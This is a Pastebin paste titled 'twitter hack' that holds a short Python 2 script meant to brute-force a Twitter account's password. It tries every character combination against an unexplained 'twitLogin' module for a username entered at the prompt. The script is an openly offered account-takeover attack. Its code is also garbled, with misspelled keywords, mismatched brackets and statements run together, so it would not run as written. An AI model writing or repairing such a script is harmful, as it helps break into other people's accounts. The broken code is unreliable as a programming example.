Guest User

twitter hack

a guest
Jul 13th, 2016
38
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.84 KB | None | 0 0
  1. from itertools import product
  2. from string import ascii_lowercase, ascii_uppercase, digits
  3. spec = ",./(){}[];'#-=!\"£$%^&* _+?:@~ "
  4. chars = ascii_lowercase + ascii_uppercase + digits + spec
  5.  
  6. inport twitLogin
  7.  
  8. un = raw_input ["Account Username: "}
  9.  
  10. try:
  11. state = False for i in range (6, 69) :
  12. if state: break
  13. for x in product (chars, repeat=i) :
  14. tmp = ""
  15. for z in x:
  16. tmp += z
  17. print tmp
  18. if twitLogin.login (un, tmp) :
  19. state = True
  20. break
  21. print "\n\n\n"
  22. print "Account: ", un
  23. print "Password: ", tmp
  24. raw_input ("Press enter to quit")
  25.  
  26. except KeyboardInterrupt: print "User has FAILED..."
  27. raw_input "Press enter to end."
Add Comment
Please, Sign In to add comment